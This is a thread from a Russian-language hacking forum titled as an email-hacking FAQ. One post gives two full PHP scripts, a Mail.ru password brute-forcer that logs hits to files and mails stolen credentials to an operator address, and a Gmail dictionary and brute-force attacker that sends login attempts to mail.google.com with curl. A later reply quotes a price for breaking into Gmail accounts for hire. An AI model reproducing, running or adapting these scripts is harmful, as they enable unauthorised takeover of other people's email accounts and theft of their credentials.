Deementor ViP Пол: Регистрация: 17.09.2006 Сообщений: 1,182 Репутация: 1592	Re: FAQ по взлому почты. Лучше вообще не использовать проги на своих машинах, регистрируемся на бесплатном хостинге, главное чтобы он держал file get contents и ставим скрипт PHP код: css ********* <html> <head> <style> body { padding:10px; background:#2A2E33; font-family:tahoma, verdana, arial; font-size:11px; text-align:center; color:#B9B9BD; } a:link, a:hover, a:visited { color:#B9B9BD; text-decoration: none; } input { vertical-align:middle; margin:1px 0; padding-right:10px; border:1px solid #336600; padding:2px; background:#363940; color:#B9B9BD; } form { padding:10px; border:1px solid #666; width:200px; margin:0 auto; } </style> <title>Mail.ru Bruteforce</title> </head> <body> ************* <? error_reporting (0); if(set_time_limit(0)) { set_time_limit(0); ignore_user_abort(1); $limit = true; } echo('<a href="?id=1">По списку паролей</a><br><a href="?id=2">Список Email</a><br><br>'); function login($email,$password) { $email = strtolower($email); list($login, $domain) = explode('@',$email); $openMail = file_get_contents('http://win.mail.ru/cgi-bin/auth?Login='.urlencode($login).'&Password='.urlencode($password).'&Domain='.urlencode($domain)); if(!preg_match('\|<title> Вход в систему </title>\|',$openMail) && preg_match('\|<title>.+'.str_replace('.','\.',$email).'.+</title>\|',$openMail)) { return true; } else { return false; } } $good = 'GOOD.txt'; $bad = 'BAD.txt'; if($_GET['id']) { ?> Good mail "<?=$good?>" <? if(is_writable($good)) echo('<font color=YellowGreen>доступен для записи</font>'); else echo('<font color=Red>не доступен для записи</font>'); ?><br> Bad mail "<?=$bad?>" <? if(is_writable($bad)) echo('<font color=YellowGreen>доступен для записи</font>'); else echo('<font color=Red>не доступен для записи</font>'); ?><br> set_time_limit() = <? if($limit) echo('<font color=YellowGreen>On</font> (Время работы скрипта не ограничено)'); else echo('<font color=Red>Off</font> (Время работы скрипта ограничено)'); ?><br><br> <? } $good = fopen($good,'a'); $bad = fopen($bad,'a'); if($_GET['id'] == '1') { if(eregi('^[a-z0-9\._-]+@[a-z0-9\._-]+.[a-z]{2,5}$',$_POST['email']) && $_POST['file'] && $_POST['admin']) { $file = file_get_contents($_POST['file']); $file = str_replace("\r\n","\n",$file); $file = explode("\n", $file); for($i=0;$i<count($file);$i++) { $password = $file[$i]; $send = 'Email: '.$_POST['email'].', password: '.$password; if(login($_POST['email'],$password)) { fwrite($good, $send); fwrite($good, "\n"); mail($_POST['admin'],'Brute: '.$_POST['email'],$send,'From: '.$_POST['email']."\r\n"); echo($send.'<br>'); break; } else { fwrite($bad, $send); fwrite($bad, "\n"); } } } else { echo('<form method=\'POST\'> Email для атаки:<br> <input type=\'text\' name=\'email\'><br> Email Админа:<br> <input type=\'text\' name=\'admin\'><br> Список:<br> <input type=\'text\' name=\'file\'><br><br> <input type=submit> </form>'); } } elseif($_GET['id'] == '2') { if($_POST['pass'] && $_POST['file'] && $_POST['admin']) { $file = file_get_contents($_POST['file']); $file = str_replace("\r\n","\n",$file); $file = explode("\n", $file); for($i=0;$i<count($file);$i++) { $mails = $file[$i]; $send = 'Email: '.$mails.', password: '.$_POST['pass']; if(login($mails,$_POST['pass'])) { fwrite($good, $send); fwrite($good, "\n"); mail($_POST['admin'],'Brute: '.$mails,$send,'From: '.$mails."\r\n"); echo($send.'<br>'); continue; } else { fwrite($bad, $send); fwrite($bad, "\n"); } } } else { echo('<form method=\'POST\'> Пароль для брута:<br> <input type=\'text\' name=\'pass\'><br> Email Админа:<br> <input type=\'text\' name=\'admin\'><br> Список:<br> <input type=\'text\' name=\'file\'><br><br> <input type=submit> </form>'); } } fclose($good); fclose($bad); ?> </body> </html> PHP код: <?php ////////////////////// ////Gmail-Brute////// /////////////////////// //////////////////////// # This script was created to Brute Force G-Mail Logins,# #it Uses CURL and 2 Methods of Login attacks (Brute Force and Dictionary) # //////////////////////// $dic ="your Dictionary file here.txt"; /////////////////////// echo " <title>Gmail Brute Force Attacker</title> </head> <style type='text/css'> body { font:Verdana, Arial, Helvetica, sans-serif; font-size:12px; border-color:#FFFFFF; } .raster_table { background-color:#444444; border-color:#CCCCCC; } .alert { color:#FF0000; } </style> <body> <table cellpadding='0' cellspacing='0' align='center' class='raster_table' width='75%'> <tr> <td> <div align='center'><b>Gmail Brute Force Attacker</b></div> </td> </tr> </table> <table cellpadding='0' cellspacing='0' align='center' class='raster_table' width='75%'> <tr> <td> <div align='center'> </div> </td> </tr> <tr> <td> <div align='center'>   </div> </td> </tr> <tr> <td> <div align='center'> <form method='post'> Username to brute:<br> <input name='username' type='text' /><br><br> <input name='attack' type='submit' value='dictionary' /> - <input name='attack' type='submit' value='brute' /><br> </form> </div> </td> </tr> <tr> <td> <div align='center'>   </div> </td> </tr> </table> "; // Sets variables and retrives google error for comparing if(isset($_POST['attack']) && isset($_POST['username'])) { $username = $_POST['username']; $headers = array( "Host: mail.google.com", "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.4) Gecko/20060508 Firefox/1.5.0.4", "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,/;q=0.5", "Accept-Language: en-us,en;q=0.5", "Accept-Encoding: text", # No gzip, it only clutters your code! "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7", "Date: ".date(DATE_RFC822) ); $c = curl_init('https://mail.google.com/mail/feed/atom'); curl_setopt($c, CURLOPT_HTTPAUTH, CURLAUTH_ANY); // use authentication curl_setopt($c, CURLOPT_HTTPHEADER, $headers); // send the headers curl_setopt($c, CURLOPT_RETURNTRANSFER, 1); // We need to fetch something from a string, so no direct output! curl_setopt($c, CURLOPT_FOLLOWLOCATION, 1); // we get redirected, so follow curl_setopt($c, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($c, CURLOPT_SSL_VERIFYHOST, 1); curl_setopt($c, CURLOPT_UNRESTRICTED_AUTH, 1); // always stay authorised $wrong = curl_exec($c); // Get it curl_close($c); // Close the curl stream } //Dictionary Attack if($_POST['attack'] == "dictionary") { $Dictionary = file("$dic"); for ($Position = 0; $Position < count($Dictionary); $Position++) { $Dictionary[$Position] = str_replace("\r\n", "", $Dictionary[$Position]); if(check_correct($username, $Dictionary[$Position])) { die("<table cellpadding='0' cellspacing='0' boreder='1' align='center' class='raster_table' width='75%'> <tr> <td> <div align='center'><b>Found the password of: ".$Dictionary[$Position]."<br> For the account: ".$username."</b></div> </td> </tr> </table> </body> </html>"); } } echo "<table cellpadding='0' cellspacing='0' boreder='1' align='center' class='raster_table' width='75%'> <tr> <td> <div align='center'><b>Sorry... a password was not found for the account of <span class='alert'>".$username."</span> during the dictionar y attack.</b></div> </td> </tr> </table>"; } //Brute Attack elseif($_POST['attack'] == "brute") { for ($Pass = 0; $Pass < 2; $Pass++) { if ($Pass == 0){$Pass = "a";} elseif ($Pass == 1){ $Pass = "a"; } if(check_correct($username, $Pass)) { die("<table cellpadding='0' cellspacing='0' boreder='1' align='center' class='raster_table' width='75%'> <tr> <td> <div align='center'><b>Found the password of: ".$Dictionary[$Position]."<br> For the account: ".$username."</b></div> </td> </tr> </table> </body> </html>"); } } echo "<table cellpadding='0' cellspacing='0' boreder='1' align='center' class='raster_table' width='75%'> <tr> <td> <div align='center'><b>Sorry... a password was not found for the account of <span class='alert'>".$username."</span> during the brute for ce attack.</b></div> </td> </tr> </table>"; } echo "</body> </html>"; // Function for checking whether the username and password are correct function check_correct($username, $password) { global $wrong, $headers; $c = curl_init('https://'.$username.':'.$password.'@mail.google.com/mail/feed/atom'); curl_setopt($c, CURLOPT_HTTPAUTH, CURLAUTH_ANY); // use authentication curl_setopt($c, CURLOPT_HTTPHEADER, $headers); // send the headers curl_setopt($c, CURLOPT_RETURNTRANSFER, 1); // We need to fetch something from a string, so no direct output! curl_setopt($c, CURLOPT_FOLLOWLOCATION, 1); // we get redirected, so follow curl_setopt($c, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($c, CURLOPT_SSL_VERIFYHOST, 1); curl_setopt($c, CURLOPT_UNRESTRICTED_AUTH, 1); // always stay authorised $str = curl_exec($c); // Get it curl_close($c); if($str != $wrong) {return true;} else {return false;} } ?>

28.03.2010, 14:16	#42
CashMashine Неактивный пользователь Регистрация: 28.03.2010 Сообщений: 3 Репутация: 0	Re: FAQ по взлому почты. сколько стоит обычно взлом почты?(gmail.com)

01.04.2010, 19:41	#43
Deementor ViP Пол: Регистрация: 17.09.2006 Сообщений: 1,182 Репутация: 1592	Re: FAQ по взлому почты. CashMashine, от 5 wmz

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Вопросы по Assembler/Dizassembler и взлому...	ErrorMs	Программирование	105	27.01.2011 09:35
Настройка DNS для почты	Artem Smirno	Настраиваем собственный хостинг	6	18.10.2009 22:38
Видео урок по взлому	igorini1981	Хакинг в глобальной сети WWW	0	12.03.2009 21:35
Вопрос чайника по взлому удаленного хоста	Trojanets	Хакинг в глобальной сети WWW	3	29.12.2008 20:38
Анализируем 7 шагов хакера по взлому крупных сетей	DOS	Безопасность	1	19.08.2005 02:52